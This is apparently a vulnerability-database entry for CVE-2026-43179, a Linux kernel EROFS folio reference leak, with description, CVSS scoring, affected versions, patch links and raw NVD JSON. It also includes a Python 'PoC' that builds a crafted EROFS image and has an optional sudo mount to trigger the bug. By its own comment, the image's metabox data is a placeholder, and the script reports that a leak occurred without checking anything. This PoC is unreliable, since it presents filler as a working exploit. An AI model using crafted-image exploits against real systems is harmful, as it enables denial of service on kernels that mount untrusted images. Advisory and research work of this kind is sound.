Security Vulnerability Report
CVE-2026-43179 CVSS 5.5 MEDIUM

Published: 2026-05-06 12:16:36
Last Modified: 2026-05-12 19:48:30
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

erofs: fix incorrect early exits for invalid metabox-enabled images

Crafted EROFS images with metadata compression enabled can trigger incorrect early returns, leading to folio reference leaks.

However, this does not cause system crashes or other severe issues.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

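cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.17 up to, but excluding, 6.18.16) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.19 up to, but excluding, 6.19.6) - VULNERABLE
Linux Kernel (all versions that have EROFS enabled and include the metabox patch; see the fix commits in the reference links for details)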

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2026-43179: EROFS folio reference leak
# This script creates a crafted EROFS image with invalid metabox.

import struct
import os

# EROFS magic number
EROFS_SUPER_MAGIC = 0xE0F5E1E2


def create_crafted_image(filename):
    with open(filename, 'wb') as f:
        # Write Superblock (128 bytes)
        # Offset 0: Magic (4 bytes)
        f.write(struct.pack('<I', EROFS_SUPER_MAGIC))
        # Offset 4: Checksum (4 bytes)
        f.write(struct.pack('<I', 0))
        # Offset 8: Feature_compat (4 bytes) - Enable metabox (0x00000004)
        f.write(struct.pack('<I', 0x00000004))
        # Fill rest of superblock with zeros (simplified)
        f.write(b'\x00' * (128 - 12))
        # Write invalid metabox data to trigger the bug
        # This is a placeholder for the actual complex structure required
        f.write(b'INVALID METABOX DATA' * 100)
    print(f"[+] Crafted EROFS image created: {filename}")


def trigger_vulnerability(image_path):
    print(f"[*] Attempting to mount {image_path}...")
    # This requires root privileges or user namespace capabilities
    # In a real scenario, this would trigger the folio leak in the kernel
    os.system(f"sudo mount -t erofs -o loop {image_path} /mnt/erofs_test 2>&1")
    print("[+] If kernel is vulnerable, memory leak occurred.")


if __name__ == "__main__":
    img_name = "crafted_erofs.img"
    create_crafted_image(img_name)
    # trigger_vulnerability(img_name)  # Uncomment to run actual mount

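References

https://git.kernel.org/stable/c/041b5163bb9b2e81050bcd885b3373bf2f42d5f5 (Patch)
https://git.kernel.org/stable/c/56e4a84220045b6af0f1efc11825b39217c7decf (Patch)
https://git.kernel.org/stable/c/643575d5a4f24b23b0c54aa20aa74a4abed8ff5e (Patch)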

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43179", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T12:16:36.417", "lastModified": "2026-05-12T19:48:29.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: fix incorrect early exits for invalid metabox-enabled images\n\nCrafted EROFS images with metadata compression enabled can trigger\nincorrect early returns, leading to folio reference leaks.\n\nHowever, this does not cause system crashes or other severe issues."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17", "versionEndExcluding": "6.18.16", "matchCriteriaId": "742E05BA-773A-4EF3-822F-A4A7DED31A65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/041b5163bb9b2e81050bcd885b3373bf2f42d5f5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/56e4a84220045b6af0f1efc11825b39217c7decf", "source": 
"416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/643575d5a4f24b23b0c54aa20aa74a4abed8ff5e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}